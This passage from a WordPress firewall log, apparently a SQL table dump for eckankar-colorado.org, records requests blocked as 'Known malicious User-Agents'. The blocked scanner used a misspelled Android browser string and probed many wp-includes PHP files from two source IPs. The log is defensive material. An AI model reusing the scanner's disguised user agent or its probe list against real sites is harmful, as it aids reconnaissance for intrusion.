User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXdpZGdldHMtY29udHJvbGxlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133987,1699932408.270278,1699932408.261400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-widget-types-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXdpZGdldC10eXBlcy1jb250cm9sbGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134016,1699932574.963469,1699932574.941700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvd3AtaW5jbHVkZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(133988,1699932401.072843,1699932401.064000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXVzZXJzLWNvbnRyb2xsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133989,1699932393.241606,1699932393.231000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-url-details-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXVybC1kZXRhaWxzLWNvbnRyb2xsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134107,1699994935.260282,1699994935.238900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/mu-plugins-old/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy1vbGQv\",\"category\":\"brute-force\",\"ssl\":1}'),(134015,1699932588.911815,1699932588.889900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/autoload-php7.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvYXV0b2xvYWQtcGhwNy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133990,1699932387.802335,1699932387.793700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXRoZW1lcy1jb250cm9sbGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133991,1699932383.070250,1699932383.061500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXRlcm1zLWNvbnRyb2xsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133992,1699932377.993157,1699932377.984400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-templates-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXRlbXBsYXRlcy1jb250cm9sbGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134014,1699932591.586103,1699932591.577500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/autoload.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvYXV0b2xvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133993,1699932372.474158,1699932372.465400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-template-revisions-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXRlbXBsYXRlLXJldmlzaW9ucy1jb250cm9sbGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133994,1699932367.106764,1699932367.098000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-template-autosaves-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXRlbXBsYXRlLWF1dG9zYXZlcy1jb250cm9sbGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134013,1699932601.562010,1699932601.541400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/lib/constants.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvbGliL2NvbnN0YW50cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133995,1699932361.051667,1699932361.042900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXRheG9ub21pZXMtY29udHJvbGxlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133996,1699932357.900830,1699932357.891900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXNpdGUtaGVhbHRoLWNvbnRyb2xsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133997,1699932350.645290,1699932350.636500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-sidebars-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXNpZGViYXJzLWNvbnRyb2xsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134108,1699994922.110920,1699994922.102300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-templates.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLXRlbXBsYXRlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134012,1699932485.337058,1699932485.323100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/search/class-wp-rest-term-search-handler.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL3NlYXJjaC9jbGFzcy13cC1yZXN0LXRlcm0tc2VhcmNoLWhhbmRsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133998,1699932347.029985,1699932347.021200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXNldHRpbmdzLWNvbnRyb2xsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133999,1699932341.768009,1699932341.759200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXNlYXJjaC1jb250cm9sbGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134000,1699932336.343130,1699932336.327700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXJldmlzaW9ucy1jb250cm9sbGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134011,1699932493.963186,1699932493.953100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL3dwLWluY2x1ZGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134001,1699932331.350125,1699932331.336700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXBvc3RzLWNvbnRyb2xsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134002,1699932324.635698,1699932324.625700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LXBvc3QtdHlwZXMtY29udHJvbGxlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134010,1699932498.321394,1699932498.312600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps-index.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) 